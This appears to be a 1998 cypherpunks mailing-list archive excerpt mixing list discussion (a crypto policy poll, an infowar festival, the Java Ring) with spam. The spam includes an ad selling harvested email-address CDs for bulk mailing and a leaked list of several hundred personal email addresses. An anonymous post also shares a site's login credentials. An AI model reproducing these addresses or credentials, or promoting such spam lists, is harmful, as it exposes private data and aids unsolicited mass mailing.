We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 1800+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 10 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.  We received it just
prior to finishing production work on the new CD.  We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.  We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We cleaned these, and came up with about
100,000 addresses. These are also mixed in.

We also included a 6+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 5,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
6 Million+ 

>>> NOW ONLY $150.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.


***ADDED BONUS***
All our customers will have access to our updates on the CD volume
they purchase.  That's right, we continually work on our CD.  Who 
knows when those other CDs were made. We're constantly adding 
and deleting addresses, removes. Etc.  It all comes back to quality.  
No one else offers that! 

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere...PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 1A email addresses
for only $150.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
JKP Enterprises
700 Boulevard 
Suite 102
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Terry Drymonacos <tdrymonacos@asecedi.com>
Date: Mon, 6 Apr 1998 07:43:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Cryptography Policy poll at computer.org
In-Reply-To: <199804051725.NAA16903@alcove.wittsend.com>
Message-ID: <3.0.5.32.19980406104934.009a0bf0@mailserver.asecsys.com>
MIME-Version: 1.0
Content-Type: text/plain


Can you be more specific Mike?
exact URL? I can't seem to find it..


At 01:25 PM 4/5/98 -0400, you wrote:
>	I thought that this might be of some interest to cypherpunks...
>
>	Go to http://www.computer.org and follow the member poll link
>from there.
>
>	Mike

Terry Drymonacos
MailTo:statt@usa.net
get 0xE5751CD1 via keyserver
fingerprint= 1AD3 F57E 7751 2107 A561 42E7 1C9C C14B 
Hail Eris!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Apr 1998 08:03:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Info War Festival
Message-ID: <199804061503.LAA24753@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


http://web.aec.at/infowar/

-----

Ars Electronica Festival 98 
INFOWAR - information. macht. krieg.
7. - 12.9.1998
Linz, Austria

Presse - Information [Excerpts]
20.3.1998 

Ars Electronica, one of the world's most highly-acclaimed 
festivals at the interface of art, technology and society, 
has been presented annually since 1979. 

INFOWAR, the title of this year's festival, places the strategies 
of data-supported wars - from the Gulf Conflict to the skirmishes 
of cyberguerillas - into the focal point of artistic as well as
theoretical and scientific interest, to thereby shed light on the 
internal logic of the information society in connection with war. 

Numerous events, installations, network projects, performances and 
a symposium make up the festival's program to confront and deal 
with this subject. 

Symposium INFOWAR

September 8 - 9, 1998 New weapons systems and military strategies 
will not exclusively occupy the middle point of these discussions. 
The aim is to elaborate on "information as a strategic weapon," 
the power of the media as political power, the new potential hot 
spots of conflict and new images of "enemy" in an information 
society characterized by global economic and financial markets. 
But this also has to do with hacker myths, cryptography, electronic 
bugging operations, and the serious concerns regarding national 
security versus private citizens' fears of the complete loss of 
the right of privacy. 

This symposium will deploy works of art and artistic responsibility 
as methods for coming to terms with these issues and achieving 
increased sensibility toward them. 

-----

Introduction

The information society - no longer a vague promise of a better 
future, but a reality and a central challenge of the here-and-now
- is founded upon the three key technologies of electricity,
telecommunications and computers: Technologies developed for the 
purposes, and out of the logic, of war, technologies of simultaneity 
and coherence, keeping our civilian society in a state of permanent 
mobilisation driven by the battle for markets, resources and spheres 
of influence. A battle for supremacy in processes of economic 
concentration, in which the fronts, no longer drawn up along 
national boundaries and between political systems, are defined by 
technical standards. A battle in which the power of knowledge is 
managed as a profitable monopoly of its distribution and 
dissemination. 

The latest stock market upheavals have laid bare the power of a 
global market, such as only the digital revolution could have 
fathered, and which must be counted as the latters most widely-felt
direct outcome. The digitally-networked market of today wields more 
power than the politicians. Governments are losing their say in the 
international value of their currencies; they can no longer control, 
but only react. The massive expansion of freely-accessible
communication networks, itself a global economic necessity, imposes 
severe constraints on the arbitrary restriction of information flows. 

Any transgression of a critical control functions in the 
cybertechnologies sphere of responsibility and influence puts 
central power wielders in a hitherto unheard-of position of 
vulnerability and openness to attack. The geographic frontiers of 
the industrial age are increasingly losing their erstwhile 
significance in global politics, and giving way to vertical fronts 
along social stratifications. 

Whereas, in the past, war was concerned with the conquering of 
territory, and later with the control of production capacities, war 
in the 21st century is entirely concerned with the acquisition
and exercise of power over knowledge. The three fronts of land, sea 
and air battles have been joined by a fourth, being set up within 
the global information systems. Spurred on by the "successes" of the 
Gulf war, the development of information warfare is running at full 
speed. Increasingly, the attention of the military strategists is 
turning away from computer-aided warfare - from potentiation of the 

destructive efficiency of military operations through the
application of information technology, virtual reality and high-tech 
weaponry - to cyberwar, whose ultimate target is nothing less than 
the global information infrastructure itself: annihilation of the 
enemys computer and communication systems, obliteration of his 
databases, destruction of his command and control systems. Yet 
increasingly the vital significance of the global information 
infrastructure for the functioning of the international finance 
markets compels the establishment of new strategic objectives: not 
obliteration, but manipulation, not destruction, but infiltration 
and assimilation. "Netwar" as the tactical deployment of information 
and disinformation, targeted at human understanding. 

These new forms of post-territorial conflicts, however, have for 
some time now ceased to be preserve of governments and their 
ministers of war. NGOs, hackers, computer freaks in the service of 
organised crime, and terrorist organisations with high-tech expertise 
are now the chief actors in the cyberguerilla nightmares of national 
security services and defence ministries. 

In 1998, under the banner of "INFO WAR", the Ars Electronica Festival 
of Art, Technology and Society, is appealing to artists, theoreticians 
and technologists for contributions relating to the social and 
political definition of the information society. The emphasis here 
will lie not on technological flights of fancy, but on the fronts 
drawn up in a society that is in a process of fundamental and violent 
upheaval. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Interactive Services <interactive.services1@gartner.com>
Date: Mon, 6 Apr 1998 10:31:42 -0700 (PDT)
To: Gartner Interactive Users <interactive.users@gartner.com>
Subject: Live Tomorrow - Free Keynote Sessions from Predicts
Message-ID: <199804061731.KAA25340@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Subscriber:

As a registered user of GartnerGroup Interactive, we invite you
to join our FREE  webcasts of keynote sessions live from
GartnerGroup Predicts: The IT Marketplace, April 7 - 9, in San
Diego.

These FREE Keynotes, brought to you by GartnerGroup Live, offer
exciting predictions and captivating presentations from
world-renowned economic advisor George Gilder, GartnerGroup
analysts and an exclusive panel of CEO's featuring David House
(Chairman, President and CEO, Bay Networks), Dr. Eric Schmidt
(Chairman of the Board and CEO, Novell, Inc.), John Roth
(President and CEO, Nortel (Northern Telecom). For more
information visit
http://www.gartner.com/public/static/gr/glive.html

----------------------------------------------------------------

Message Contents:

1. About the FREE Keynote Webcasts from GartnerGroup Predicts
2. Additional Presentations Available from GartnerGroup Predicts
3. How to Listen
4. How to Unsubscribe from Future Mailings

----------------------------------------------------------------

1. FREE KEYNOTE WEBCASTS FROM GARTNERGROUP PREDICTS

The entire IT market will be buzzing as the leading minds of IT
share their visions of the next five years at GartnerGroup
Predicts in San Diego, next week.

GartnerGroup Live enables you to watch the complete, uncut
webcasts of keynotes and selected sessions from the conference
using streaming audio and video technology. For the hottest IT
predictions, point your browser to
http://www.gartner.com/public/static/gr/glive.html

Here's what's yours FREE as a Gartner Interactive Subscriber:
(All times represent Pacific Standard Time zone)

Tuesday, April 7, 8:30 AM
I. Information Technology: Transforming Your Business
In this opening keynote address, world-renowned economic advisor
George Gilder will set the stage for Predicts with an insightful
look at larger economic issues surrounding the IT market.

Tuesday, April 7, 9:15 AM
II. GartnerGroup Predicts: The State of the IT Industry
GartnerGroup's State of the IT Industry address, presented by
senior GartnerGroup analysts Bill McNee and Davis Blair, will
examine the current condition and future direction of this
volatile and complex industry.

Wednesday, April 8, 11:00 AM
III. Networking Visionary Panel: What's Coming Down the Wire (or Fiber)?
Our panel of networking heavyweights, including David House
(Chairman, President and CEO, Bay Networks), Dr. Eric Schmidt
(Chairman of the Board and CEO, Novell, Inc.), John Roth
(President and CEO, Nortel (Northern Telecom).

GartnerGroup analysts and other CEOs, will look ahead and debate
critical issues such as: industry consolidation among vendors
and across markets; the blurring of technology boundaries; which
technologies will dominate for voice, data, video and evolving
infrastructure alternatives and market leadership criteria and
challenges.


2. OTHER GARTNERGROUP PREDICTS PRESENTATIONS AVAILABLE FROM GARTNERGROUP LIVE

This series of dynamic Powerhouse presentations and User
Environment Tracks can be purchased on Gartner Interactive.

I. The IT Powerhouse Sessions
http://www.gartner.com/public/static/gr/power.html

In these Predicts sessions GartnerGroup takes a hard look at a
dozen IT market megavendors that enjoy large market
capitalization and influence, large customer bases and span
multiple technologies and markets. You'll learn how they got
where they are today, where they're going tomorrow, and which
up-and-comers could knock them off the hill.

Hear leading GartnerGroup analyst predictions about:

-AT&T Will it Survive?
-Cisco: Success in the Next Generation?
-IBM: E-Business Driver or Passenger?
-Intel: More and More Powerful
-Microsoft: Will the Future be as Bright?
-SAP: Continuing Kingpin or Future Retread?
-Many more sessions are also available!

II. IT User Environment Tracks
http://www.gartner.com/public/static/gr/user.html

In these specially selected information-packed sessions,
GartnerGroup's Research and Advisory Services and Dataquest
analysts will deliver actionable advice on resolving your most
pressing IT procurement, deployment and management concerns.

Tune in and discover:

-Emerging Technology Trends and Their Business Impact
-Internet/Intranet Architectures: Development Issues
-NT's Readiness for the Enterprise
-Network Computing and Total Cost of Ownership
-From TCO to ROI
-Networking: Switching Gigabits to GigaDollars
-Many, many more sessions also available!


3. HOW TO LISTEN

To listen and view the keynotes, you will need the following
minimum requirements:

For Windows: Windows 3.1, 95 or NT; 486 machine; a 16-bit sound
card with driver; an Internet connection; 28.8 Kbps modem or
above; 8 MB RAM; 2 MB hard disk space.

For Macintosh: PowerPC (recommended); 68040K processor; 8 MB
RAM; 2 MB hard disk space; an Internet connection; and 28.8 Kbps
modem or above.

You will also need Real Network's Real Media player or
Microsoft's Netshow. The software is downloadable in a couple of
minutes (if you are using Internet Explorer 4.0 you may already
have Netshow). Once the plug-in is installed, it works
seamlessly with your Web browser.

Download the Real Media Player at
http://www.real.com/products/player/downloadrealplayer.html?wp=d
l031198page&src=download

Download Netshow at
http://www.microsoft.com/netshow/download/player.htm

If you have any trouble viewing the keynotes, please see these
Frequently Asked Questions at http://www.audionet.com/faq or
call GartnerGroup's client support center at 203-316-3600.


4. UNSUBSCRIBE

We sent you this update because you are registered on the
Gartner Interactive web site.

To have yourself removed from our updates mailing list, please
send an e-mail to unsubscribe.updates@gartner.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 6 Apr 1998 03:02:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Password For No Bullshit Sex Site
Message-ID: <199804061002.MAA07474@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an honest to god ma and pa run sex site as far as I can tell.
I didnt get a million UCEs after requesting their password.
+++++


The following legal warning is sent with EVERY username/password that we
send
out, (as this little note will now be), and is not written specifically
toward
you, but as a general warning for everyone, so please don't write back and
take
it personally. This is our way of further protecting ourselves legally,
without using an AVS or Credit Card Number. The username and password ARE
contained in the body of the letter which follows this warning.


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

This letter is NOT SPAM! It is being sent to you at YOUR OWN REQUEST. If you
did not request this letter,
then someone else using your e-mail account or posing as you, most certainly
did. Please reply immediately if you suspect someone else is fraudently
accessing your mail account, so that we can contact the proper authorities
with
the headers of the original email, and add you to our mail filters so that
any
further mail sent from your address will immediately be discarded, and you
will NEVER receive a password from us again. We repeat, THIS INFORMATION WAS
NOT SENT UNSOLICITED!

DO NOT EVEN READ THIS LETTER IF YOU ARE NOT OF LEGAL AGE TO VIEW ADULT
MATERIALS IN YOUR COMMUNITY!

By requesting, reading and acting upon this letter, you have sworn that you
are
of legal age to view said material and would not be breaking any of the
laws of
your community. In most areas of the USA the legal age for access to adult
materials is either 18 or 21. You MUST know the law for your area! YOU are
responsible for your own actions. If someone using this email account
attempts
to gain access to our site by hacking a fraudulent account, we will be
forced
to file charges. Please help us keep the internet safe and free by honoring
our request to make certain that it is legal for you to view hardcore adult
materials. Our only alternative to counting on your honesty is to take our
site to credit card only access. We don't want to do that if we don't have
to,
so please be honest with us and keep the net free for everyone. Thank you

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<




Hi there, Mr. and Mrs. Hackula here...

Thank you for your help.

Please don't bookmark our picture pages, as they are subject to change.
You can always access our site through:

<http://www.pornquest.com/>http://www.pornquest.com OR
<http://www.ixpres.com/hackula/porn/index.html>http://www.ixpres.com/hackul
a/porn/index.html


And while you're there, please check out our sponsors, because they
are the one's who are now keeping us free, instead of us having to use an
AVS or making our site a pay-site. Even our sponsors offer a whole month
completely free. :)



HERE IS THE CURRENT USERNAME AND PASSWORD FOR OUR HOMEPAGE.

Username: lazlosnerd
Password: nitrocola



To enter these passwords, you must first click the link on our page that
says, "Come on in for some Milk and Cookies." You will then see a box
requesting the un/pw. Enter the words exactly as they appear here... No
capital letters. Please save this email, or if you write down the un/pw,
make sure you spell them correctly.

Please remember not to give these to anyone else. Please do not publish
them anywhere, and please inform us if you find them published somewhere
on the web, or you find a page that links PAST our password request page...
Thank you for your cooperation!


Sincerely,

Mr. and Mrs. Hackula
<http://www.pornquest.com/>http://www.pornquest.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 6 Apr 1998 09:04:30 -0700 (PDT)
To: tdrymonacos@asecedi.com
Subject: Re: Cryptography Policy poll at computer.org
In-Reply-To: <3.0.5.32.19980406104934.009a0bf0@mailserver.asecsys.com>
Message-ID: <199804061604.MAA23190@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Terry Drymonacos enscribed thusly:
> Can you be more specific Mike?
> exact URL? I can't seem to find it..


> At 01:25 PM 4/5/98 -0400, you wrote:
> >	I thought that this might be of some interest to cypherpunks...

> >	Go to http://www.computer.org and follow the member poll link
> >from there.

	http://ada.computer.org/surveys/Privsec.htm

> >	Mike
> 
> Terry Drymonacos
> MailTo:statt@usa.net
> get 0xE5751CD1 via keyserver
> fingerprint= 1AD3 F57E 7751 2107 A561 42E7 1C9C C14B 
> Hail Eris!

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Apr 1998 09:33:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MCs Write Clinton on Crypto
Message-ID: <199804061633.MAA04417@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


More congressionals are sending POTUS cryptograms:

   http://jya.com/mcs-potus.htm

Signers:

Richard A. Gephardt, M.C.
Zoe Lofgren, M.C.
Vic Fazio, M.C.
Martin Frost, M.C.
Sam Gejdenson, M.C.
John Conyers, Jr., M.C.
Edward J. Markey, M.C.
Anna G. Eshoo, M.C.
Rick Boucher, M.C.
Calvin M. Dooley, M.C.
James P. Moran, M.C.
Adam Smith, M.C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travish+cp-02@dejanews.com
Date: Mon, 6 Apr 1998 13:50:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [noise] Java Ring Crypto iButton
Message-ID: <199804062050.PAA27491@byers.dejanews.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.dalsemi.com/News_Center/Press_Releases/1998/prjavaring.html

JVM, 8-bit processor, 6k SRAM, some tamper-resistant features,
RTC, and 1024-bit math accelerator in a US$50 ring.  Cool.

I remember someone telling me recently some MIT folks had done some
research in using the human body as a communication bus.
That seems like a synergistic technology to wearable crypters.

ObSorryIfYou'veSeenThisAlready: true
--
Travis Hassloch
Database Administrator, Deja News Inc.
More funky styles than Adobe has fonts




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info2@aestiva.com
Date: Mon, 6 Apr 1998 18:30:39 -0700 (PDT)
Subject: May I Send You Some Information?
Message-ID: <199804070130.SAA28548@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I'd like to send you information about a product
for making Web sites super-dynamic without CGI programming. 
Our product gives you:

  Shopping carts * Databases * Password screens
  Chat rooms * Forums * Guestbooks * Quizzes
  Games and puzzles * Random sayings * Rotating banners
  Counters * File upload boxes * Data entry forms
  Online spreadsheets * Classifieds * Text searches
  Online editors * Wizards * and much more....

If you'd like more information by email, please reply.

Thank you very much for your consideration,

Aestiva Sales Representative

P.S: If this information isn't for you, then please ignore
or pass it along to your Web site designer.

(I got your email address from a site listed in the Yahoo Business
and Economy section. If you prefer not to get email from us,
please reply with the word REMOVE in the subject line.)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
AESTIVA HTML/OS - The World's Most Powerful HTML Platform
Phone:            1-310-318-1150  (9am-5pm PST)
E-mail:           info@aestiva.com
                  Hermosa Beach, California, USA
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


>From POPmail Tue Apr  7 06:06:21 1998
Received: from proxy1.ba.best.com (root@proxy1.ba.best.com [206.184.139.12]) by shell2.ba.best.com (8.8.8/8.8.BEST) with ESMTP id KAA00488 for <vipul@shell2.ba.best.com>; Mon, 6 Apr 1998 10:44:27 -0700 (PDT)
From: root@amazona.aestiva.com
Received: from krypton.netropolis.org (root@krypton.netropolis.org [208.222.215.97]) by proxy1.ba.best.com (8.8.8/8.8.BEST) with ESMTP id KAA16874 for <vipul@best.com>; Mon, 6 Apr 1998 10:41:55 -0700 (PDT)
Received: from amazona.aestiva.com (amazona.aestiva.com [206.83.186.148])
          by krypton.netropolis.org (8.8.5/8.8.4) with ESMTP
	  id NAA24077 for <massmail@vipul.net>; Mon, 6 Apr 1998 13:48:50 -0400
Received: (from root@localhost) by amazona.aestiva.com (8.8.4/8.6.9) id LAA23586 for massmail@vipul.net; Mon, 6 Apr 1998 11:44:40 -0700
Date: Mon, 6 Apr 1998 11:44:40 -0700
Message-Id: <199804061844.LAA23586@amazona.aestiva.com>
Subject: Mass Mail
X-UIDL: af84b772f5285a92f9743cca611d9bfb
Status: O

dbi@synergy.net
dbi@xmission.com
dbia@dbia.org
dbic@dbic.com
dbigda@awod.com
dbiggs@neocomm.net
dbillet@rgi.com
dbincorporated@humandimensions.com
dbingel@wspice.com
dbinnbnb@dnet.net
dbinter@db-interdata.com
dbirdman@arcatapet.com
dbirdman@redshift.com
dbirnell@netusa1.net
dbirnie@artisle.com
dbirtwis@albedo.net
dbjay3@mindspring.com
dbk@alaska.net
dbk@dbk-pinnacle.com
dbk@valley.net
dblack@wbns10tv.com
dblacklo@direct.ca
dblai@montec.com
dblair@montec.com
dblair@unitedtexas.com
dblanch@cyberramp.net
dblasi@ntpix.net
dblbass@cybertours.com
dbliss@castles.com
dblock@luminet.net
dblowder@christian-services.com
dbltake@deltanet.com
dblue@atlanta.com
dblume@igc.apc.org
dbminton@x31.infi.net
dboes@stanley-carter.com
dbohle@empire.net
dbolce@esper.com
dbolen@briggscorp.com
dboltz@connect.net
dboltz@mitsi.com
dbonds2@igc.net
dbonner@usit.net
dbookbin@qualitas.com
dbookmahn@webtv.net
dboone@nemonet.com
dborys@wbac.com
dbos@catalinas.net
dboschert@primary.net
dbosshard@ncerp.com
dboston@ameritech.net
dbourbon@rdraab.com
dbourgeois@giffels-nsa.com
dbowen@aeneas.net
dbowen@toxiccustard.com
dbowen@x31.infi.net
dbowers@lumasales.com
dbown@idon.com
dboyd@chilton.net
dboyd@nas.com
dbquery@outletsonline.com
dbraaten@whpacific.com
dbrady@teleport.com
dbrail@amazoncity.com
dbrandau@voltsrvgc.com
dbrands@connectnet.com
dbrands@gogetz.com
dbrannon@beaches.net
dbraun@illuminus.com
dbraun@sandiego-online.com
dbregions@outletsonline.com
dbremer@mr.net
dbretzman@base8.com
dbrewer@osmond.net
dbreznan@easyinternet.ca
dbridge@swap-shop.com
dbriere@telechoice.com
dbriggs@westates.com
dbright@ap.net
dbrinley@lgc.com
dbritt@emkf.org
dbroad@tsipr.com
dbrochu@chinchaga.ab.ca
dbrodkey@rtms.com
dbrooks@netten.net
dbrooks@ontherun.com
dbroth@okeechobee.com
dbrouwer@mbsi.net
dbrown@cococo.net
dbrown@metasolv.com
dbrown@silo.com
dbrown@specent.com
dbrown@virtualisys.com
dbrown@xs.com
dbrowne@key-logic.com
dbruce@v-wave.com
dbrunker@goetzedental.com
dbrunson@brunsonkc.com
dbrunton@seminole-electric.com
dbryant@neta.com
dbrysch@accesscomm.net
dbs@ols.net
dbsales@dbford.com
dbse@dbsengr.com
dbsinfo@cyberpromo.com
dbsinfo@dbsauto.com
dbsinfo@desscom.com
dbsmail@cyberpromo.com
dbss@solarco.com
dbsupply@cyberhighway.net
dbteam@gage.com
dbtile@icanect.net
dbuck@world.std.com
dbuckeywebmaster@danbuckeyford.com
dbuckland@unidial.com
dbudden@newcomm.net
dbuendia@whpacific.com
dbulley@mca.org
dbullock@land-5.com
dbullock@teleport.com
dbunce@idahospud.win.net
dburch@epigraphx.com
dburger@cedia.org
dburgess@inreach.com
dburke@prtm.com
dburns@cyberatl.net
dburnworth@concentric.net
dburr@inetw.net
dburski@rust.net
dbusby@mail.bootheel.net
dbush@jumppoint.com
dbush@lumasales.com
dbush@wb.esmith.com
dbutcher@alpinet.com
dbutler@backdoor.com
dbutler@enol.com
dbutler@ordata.com
dbutler@rcmllp.com
dbwallan@iceinternet.com
dbyerly@infoave.net
dc-beer-request@sed.psrw.com
dc3@dc-three.com
dc9rk@koelek.com
dc@bbcpa.com
dc@desertconcierge.com
dc@meros.com
dca@planetsales.com
dcabana@yushin.com
dcadams@skn.net
dcaikepoo@iuciyliebiga.com
dcaillet@firstco.com
dcains@hgrn.com
dcalla@mastnet.net
dcalland@peoplesuccess.com
dcals@damagedcalifornians.com
dcampbel@adams.net
dcanal@bridge.net
dcapc@dcardinal.com
dcapon@innet.com
dcard@psnw.com
dcardani@dls.net
dcarlson@fin-info.com
dcarlson@planet.net
dcarlson@platinumaudio.com
dcarman@together.net
dcarnine@interramp.com
dcarochi@prestige-electric.com
dcarpent@orednet.org
dcarr@csranet.com
dcary@ieee.org
dcasales@d-c-a.com
dcasey@cardiffsw.com
dcasey@gt.com
dcaskey@napier.com
dcastro@guidant.com
dcavern@amaonline.com
dcay@icu.com
dcb@nobolts.com
dcbaker@clinton.net
dcbare@tir.com
dcbeer@webtrek.com
dcbiepkekac@cawdaddannudt.com
dcbiker@goldray.com
dcblack@coffey.com
dcc@cloutieragraseeds.com
dcc@mb.sympatico.ca
dccdfarr@vaxxine.com
dccf@wtrt.net
dccfunds@primenet.com
dcck@pacific.net
dccphoto@dccphoto.com
dccwebmaster@dcclifecare.com
dcdavis@hslc.org
dcdnsnow@peganet.com
dcdrives@phoenix.net
dcdry@netroute.net
dce@datacoreeng.com
dce@eclipse.net
dce@net-gate.com
dcecere@wolfenet.com
dcentre@manifestimagery.com
dcfo@tpl.org
dcg@atr.com
dcg@groupdc.com
dcg@softcafe.net
dcgottaeat@mindspring.com
dchall@netsync.net
dchamber@orednet.org
dchamnes@netnitco.net
dchan@istar.ca
dchan@manager.com
dchan@pacificcoast.net
dchandler@abilnet.com
dchase@smtpgwmac.bande.com
dchathaway@tasc.com
dcheath@ns.net
dcheng@largnet.uwo.ca
dchenoweth@contelec.com
dchepil@silk.net
dchervitz@dbc.com
dchesnut@ionet.net
dchew@3wc.com
dchin@execlend.com
dching@pop.slip.net
dching@slip.net
dchiu@verite.com
dchiu@worldlinkmedical.com
dchliborob@asan.com
dchoos3@aol.com
dchriste@pangaea.ca
dchristi@macshym.com
dchu@netlock.com
dchurch@oz.net
dchynes@pressprich.com
dci@dci.ca
dci@dyncom.com
dci@mn.state.net
dci@workplacemanager.com
dcic@halycon.com
dcinfo@diversifiedcoatings.com
dcippite@cmp.com
dcisales@dcinc.net
dcisebt@eosoineapoane.com
dcisme@indy.net
dcitron@univox.com
dciwebmaster@netroam.com
dcj@aa.net
dcj@catol.com
dcj@iquest.com
dcjstope@xnet.com
dckallan@bmcind.com
dclark@accucomm.net
dclark@cookford.com
dclark@git.net
dclark@sunbeltusa.com
dclarke@rtca.org
dclarke@synaptica.com
dcliff@ghgcorp.com
dcline@intrec.com
dclingan@vol.com
dclough@stargazer.netshop.net
dclupper@ctaz.com
dcm@i-55.com
dcm@pdxaudio.com
dcmoon@tusc.net
dcn@endocrinology.com
dcneal@redcreek.com
dcochran@stratos.net
dcody@epinc.com
dcofe@oeleitoebaef.org
dcoffee@htccom.net
dcoffman@cwv.net
dcoker@dimensiondata.com
dcolbert@xnet.com
dcoleman@awod.com
dcollier@rcoinc.com
dcollins@jenchase.com
dcollison@rwd.com
dcom@cvn.net
dcom@mail.cvn.net
dcongalt@slonet.org
dcook@oz.net
dcook@soundworks.com
dcook@unixg.ubc.com
dcoombs@bn1.baynet.net
dcooper@menagerie-works.com
dcopfer@vevidence.com
dcopping@daemar.com
dcorbett@animagicfx.com
dcorbin@maxinet.com
dcornett@iac.net
dcornish@oxnardsd.org
dcorson@oz.net
dcos@ai2a.net
dcosta@wls1.com
dcota@icanect.net
dcottier@touchtechnology.com
dcoulthurst@creativecommunication.com
dcoupe@jps.net
dcourt@cyber-trek.com
gina@aestiva.com
dcoyne@netipus.com
dcp@mts.net
dcpi@sunscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dental@cheerful.com
Date: Mon, 6 Apr 1998 22:43:51 -0700 (PDT)
Subject: $9 dental, vision & prescription drugs plan
Message-ID: <199804070543.WAA00292@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


